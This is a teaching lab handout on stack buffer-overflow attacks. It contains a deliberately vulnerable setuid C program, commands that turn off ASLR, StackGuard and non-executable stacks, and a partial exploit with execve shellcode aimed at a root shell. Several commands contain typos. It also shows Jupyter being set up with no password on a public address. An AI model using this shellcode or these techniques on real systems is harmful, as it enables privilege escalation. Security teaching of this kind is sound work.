# Buffer-overflow Lab 


### What is a Buffer Overflow attack?
A buffer overflow occurs when a program or process attempts to write more data to a fixed length block of memory causing the data to overflow to other buffers, which can corrupt or overwrite whatever data they were holding.

In terms of a buffer-overflow attack the extra data that is overwritten could hold malicious instructions that could trigger a respone that could cause a program to crash or run something else. If the program that triggers the buffer overflow attack is privileged this could result in potential privilege escalation for something malicious.


### The Difference Between a 32-bit and a 64-bit Buffer Overflow attack?


The major difference between x32 and x64 machines are the length of the memory addresses. In a 64 bit machine the memory address are 64 bit long, but addresses greater than 0x0000FFFFFFFFFFF (48 bits) will raise an exception and cause a segmentation fault.

64-bit registers have names beginning with "R", 32-bit registers begin with "E"

The RPB register points to the base of the current stack frame (32-bit EBP)
The RSP register points to the top of the current stack frame (32-bit ESP)
The RIP register points to the next processor instruction

### 1. Overview
The learning objective of this lab is for students to gain the first-hand experience on buffer-overflow vulnerability
by putting what they have learned about the vulnerability from class into action. Buffer overflow is
defined as the condition in which a program attempts to write data beyond the boundaries of pre-allocated
fixed length buffers. This vulnerability can be used by a malicious user to alter the flow control of the program,
leading to the execution of malicious code. This vulnerability arises due to the mixing of the storage
for data (e.g. buffers) and the storage for controls (e.g. return addresses): an overflow in the data part can
affect the control flow of the program, because an overflow can change the return address.
In this lab, students will be given a program with a buffer-overflow vulnerability; their task is to develop
a scheme to exploit the vulnerability and finally gain the root privilege. In addition to the attacks, students
will be guided to walk through several protection schemes that have been implemented in the operating
system to counter against buffer-overflow attacks. Students need to evaluate whether the schemes work or
not and explain why. This lab covers the following topics:

- Buffer overflow vulnerability and attack
- Stack layout in a function invocation
- Shellcode
- Address randomization
- Non-executable stack
- StackGuard

### Setting Up Jupyter Via Cloudlab Console

After instantiation is complete and anaconda is installed, open up a shell node on the list view tab in CloudLab

Once you are in the terminal you will want to change user id to seed. In our lab the seed account has root privileges. In order to gain access to seed you need to input the password ***dees*** 

```
$ su seed
Password: dees
```

Once you are under the seed account change directories to /local/repository/. The reason being you want your Juypter home directory to be /local/repository/ because that is where all the files will be readily available.
```
seed@node:~$ cd /local/repository
seed@node:/local/repository$
```

Once you are in your local repository you will want to check your ip address in order to access the notebook.
```
seed@node:/local/repository$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 02:2f:eb:3e:a7:10 brd ff:ff:ff:ff:ff:ff
    inet 130.127.135.7/22 brd 130.127.135.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::2f:ebff:fe3e:a710/64 scope link
       valid_lft forever preferred_lft forever
```
In the example above our IP address is 130.127.135.7

After you have discovered your ip address you are able to open a jupyter note book input the following code
```
seed@node:/local/repository$ jupypter notebook --generate-config

Writing default config to: /home/seed/.jupyter/jupyter_notebook_config.py
```
After generating the config file you will want to set the jupyter notebook passwordless by entering the following code and when prompted to create a password you hit the [Enter] key.
```
seed@node:/local/repository$ juypter notebook password

Enter password:
Verify password:

[NotebookPasswordApp] Wrote hashed password to /home/seed/.jupyter/juypter_notebook_config.json
```
Now we are able to launch our notebook which will launch into a seed account. We will use the inet IP address we found a few steps to launch the notebook. Input the following code
```
seed@node:/local/repository$ juypter notebook --ip 130.127.135.7 --no-browser

[I 18:51:36.564 NotebookApp] Writing notebook server cookie secret to /home/seed/.local/share/jupyter/runtime/notebook_cookie_secret
[I 18:51:37.287 NotebookApp] JupyterLab extension loaded from /opt/anaconda3/lib/python3.7/site-packages/jupyterlab
[I 18:51:37.288 NotebookApp] JupyterLab application directory is /opt/anaconda3/share/jupyter/lab
[I 18:51:37.291 NotebookApp] Serving notebooks from local directory: /home/seed
[I 18:51:37.291 NotebookApp] The Jupyter Notebook is running at:
[I 18:51:37.291 NotebookApp] http://130.127.135.7:8888/
[I 18:51:37.291 NotebookApp] Use Control-C to stop this server and shut down all kernels (twice to skip confirmation).
[I 18:51:46.186 NotebookApp] 302 GET / (108.4.213.14) 0.49ms
[I 18:51:46.274 NotebookApp] 302 GET /tree? (108.4.213.14) 0.45ms
[I 18:51:49.888 NotebookApp] 302 POST /login?next=%2Ftree%3F (108.4.213.14) 0.60ms
[I 18:52:05.236 NotebookApp] New terminal with automatic name: 1
TermSocket.open: 1
TermSocket.open: Opened 1
```
By clicking on the link http://130.127.135.7:8888/ we are able to launch a notebook.

*The link and IP address will be different depending on what server you are instantiating from.

Once you are in the notebook you will be able to run and compile code through the notebook and also have access to a jupyter terminal shell through your web browser.


### 2. Lab Tasks

### 2.1 Turning Off Countermeasures

**Address Space Randomization**
Ubuntu and several other Linux-based systems uses address space randomization to randomize the starting address of heap and stack. This makes guessing the exact addresses difficult; guessing addresses is one of the critical steps of buffer-overflow attacks. In this lab, we disable this feature using the following command:
```
$ sudo sysctl -w kernel.randomize_va_space=0
```
**The StackGuard Protection Scheme**
The GCC compiler implements a security mechanism called StackGuard
to prevent buffer overflows. In the presence of this protection, buffer overflow attacks will not work.
We can disable this protection during the compilation using the `-fno-stack-protector` option. For example,
to compile a program example.c with StackGuard disabled, we can do the following:

```
$ gcc -fno-stack-protector example.c
```
**Non-Executable Stack**

Ubuntu used to allow executable stacks, but this has now changed: the binary images of programs (and shared libraries) must declare whether they require executable stacks or not, i.e., they need to mark a field in the program header. Kernel or dynamic linker uses this marking to decide whether to make the stack of this running program executable or non-executable. This marking is done automatically by the recent versions of gcc, and by default, stacks are set to be non-executable. To change that, use the following option when compiling programs:

For executable stack:

```
$ gcc -z execstack -o test test.c
```

For non-executable stack:

```
$ gcc -z noexecstack -o test test.c
```

We will turn off and use the following counter measures
```
seed@node:~$ sudo sysctl -w kernel.randomize_va_space=0
```
We will also disable NX and stack canaraies when compiling our programs
an example of a compile code with the disabled canaries  would look like

```
seed@node:~$ gcc -fno-stack-protector -z execstack -o test test.c
```

### 2.2 Running The Vulnerable program

After disabling the address space randomization we are now able to focus on the exploit. Bellow is the vulnerable program stack.

In [ ]:
/* Vulnerable program: stack.c */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
  char buffer[24];
  /* The following statement has a buffer overflow problem */
  strcpy(buffer, str); //Line 1
  return 1;
}
int main(int argc, char **argv)
{
  char str[517];
  FILE *badfile;
  badfile = fopen("badfile", "r");
  fread(str, sizeof(char), 517, badfile);
  bof(str);
  printf("Returned Properly\n");
  return 1;
}

The above program has a buffer overflow vulnerability. It first reads an input from a file called badfile, and then passes this input to another buffer in the function bof(). The original input can have a maximum length of 517 bytes, but the buffer in bof() is only 24 bytes long. Because strcpy() does not check boundaries, buffer overflow will occur. Since this program is a Set-root-UID program, if a normal user can exploit this buffer overflow vulnerability, the normal user might be able to get a root shell. It should be noted that the program gets its input from a file called badfile. This file is under users’ control. Now, our objective is to create the contents for badfile, such that when the vulnerable program copies the contents into its buffer, a root shell can be spawned.

Input the following code
```
seed@node:~$ sudo gcc -fno-stack-protector -z execstack -o stack /local/repository/stack.c
```
Now We will setuid priviliges on our newly compiled program
```
seed@node:~$ sudo chown root stack
seed@node:~$ sudo chmod 4755 stack
```

### 2.3 Fuzzing Stack using GDB Peda

You are provided with a partially completed exploit code called "exploit.c". The goal of this code is to construct contents for badfile. In this code, the shellcode is given to you. You need to develop the rest.

In [ ]:
%%writefile exploit.c
/* exploit.c */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>


char shellcode[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";
void main(int argc, char **argv)
{
  char buffer[517];
  FILE *badfile;
  /* Initialize buffer with 0x90 (NOP instruction) */
  memset(&buffer, 0x90, 517);
  /* You need to fill the buffer with appropriate contents here */
  /* ... Put your code here ... */
  /* Save the contents to the file "badfile" */

  
  /* entry point of the malicious code - This needs to be changed everytime you run the vulnerable program. 
        If this does not work, change x80 to a different value and try again.
  */
  
   *((long *) (buffer + ?)) =   ?     +   0x80; 
          /*   rpb - buffer      rpb */
    memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, 
         sizeof(shellcode));
  
  badfile = fopen("./badfile", "w");
  fwrite(buffer, 517, 1, badfile);
  fclose(badfile);
}

In order to get the values needed for the exploit we will need to fuzz stack.c. We will do this by compiling stack with an alternate name and a gdb flag. The reason behind this is we will have to continue to change the values everytime the program is recompiled. 

Run the following
```
seed@nood:~$ sudo gcc -g -o stack_dbg -z execstack -fno-stack-protector /local/repository/stack.c
seed@nood:~$ rm badfile
seed@nood:~$ touch bafile
seed@nood:~$ gdb stack_dbg
```

Once in the debugger we are going to want to leave a break point on bof because it has the vulnerability and it is before the contents of badfile are read which causes the segmentation fault we would normally get. After the break point we will want to run the program and we are going to print the values of RPB register and Buffer. This is possible because we disabled the Address Space Randomization. These values are important so you will want to write them down. next we will print the values of rbt minus buffer. The way we go about getting this value is by using the hex values we got from print $rbt &buffer

Run the following

```
gdb-peda$ break bof
gdb-peda$ run
gdb-peda$ print $rbt
gdb-peda$ print &buffer
gdb-peda$ print rbt - buffer
gdb-peda$ quit
```
*note the print rbt - buffer is hex values, else you will get an error  

After you finish the above program, compile and run it in a terminal. This will generate the contents for badfile. Then run the vulnerable program stack. If your exploit is implemented correctly, you should be able to get a root shell.

**Important:** Please compile your vulnerable program first. Please note that the program exploit.c,
which generates the badfile, can be compiled with the default StackGuard protection enabled. This is
because we are not going to overflow the buffer in this program. We will be overflowing the buffer in stack.c,
which is compiled with the StackGuard protection disabled.

```
$ gcc -o exploit exploit.c
$./exploit // create the badfile
$./stack // launch the attack by running the vulnerable program
# <---- Bingo! You’ve got a root shell!
```

It should be noted that although you have obtained the “#” prompt, your real user id is still yourself (the
effective user id is now root). You can check this by typing the following:

```
# id
uid=(500) euid=0(root)
```